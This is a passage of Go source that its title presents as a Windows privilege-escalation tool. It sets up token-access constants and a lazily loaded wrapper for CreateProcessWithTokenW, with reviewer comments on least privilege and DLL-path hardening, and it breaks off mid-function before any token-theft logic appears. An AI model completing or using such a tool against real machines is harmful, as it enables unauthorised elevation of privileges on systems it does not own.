golang实现windows提权
package main
import (
"fmt"
"syscall"
"unsafe"
"github.com/shirou/gopsutil/process"
"golang.org/x/sys/windows"
)
// Win32 access-token constants, declared locally as untyped integers.
//
// NOTE(review): golang.org/x/sys/windows, which this file already imports,
// exports identically named constants; consider using those instead of
// redeclaring the raw values here — confirm their types fit the call sites.
const (
	// TOKEN_ALL_ACCESS is the full access mask for a token object: the
	// standard required rights (0xF0000) combined with the token-specific
	// rights (0x1FF).
	// NOTE(review): this is the broadest mask a token handle can carry;
	// least privilege argues for requesting only the specific rights a
	// call site needs.
	TOKEN_ALL_ACCESS = 0xF01FF

	// SE_PRIVILEGE_ENABLED is the attribute bit that marks a privilege
	// entry as enabled.
	SE_PRIVILEGE_ENABLED = 0x2

	// TOKEN_DUPLICATE is the access right needed to duplicate a token.
	TOKEN_DUPLICATE = 0x2
)
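// Lazily bound handles for advapi32.dll and the one procedure this file
// calls from it. Nothing is loaded until the first Call/Find/Load.
var (
	// modadvapi32 refers to advapi32.dll by absolute path inside the system
	// directory. The syscall package documents that a LazyDLL created from
	// a bare file name is subject to DLL preloading, because the loader
	// then walks its default search order; an absolute path avoids that.
	//
	// The variable keeps its *syscall.LazyDLL type so other code in this
	// file is unaffected. If the type may change,
	// windows.NewLazySystemDLL("advapi32.dll") is the simpler equivalent.
	modadvapi32 = syscall.NewLazyDLL(func() string {
		const name = "advapi32.dll"
		dir, err := windows.GetSystemDirectory()
		if err != nil {
			// Fall back to the original bare-name lookup instead of
			// failing during package initialisation.
			return name
		}
		return dir + `\` + name
	}())

	// createProcessWithTokenW is the lazily resolved advapi32 export
	// CreateProcessWithTokenW.
	createProcessWithTokenW = modadvapi32.NewProc("CreateProcessWithTokenW")
)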
func CreateProcessWithTokenW(Token windows.Token,
LogonFlags uint32,
ApplicationName *uint16,
CommandLine *uint16,
CreationFlags uint32,
Environment **uint16,
CurrentDirectory *uint16,
StartupInfo *windows.StartupInfo,
ProcessInformation *windows.ProcessInformation) bool {
r0, _, _ := createProcessWithTokenW.Call(
uintptr(Token),
uintptr(LogonFlags),
uintptr(unsafe.Pointer(ApplicationName)),
uintptr(unsafe.Pointer(Comma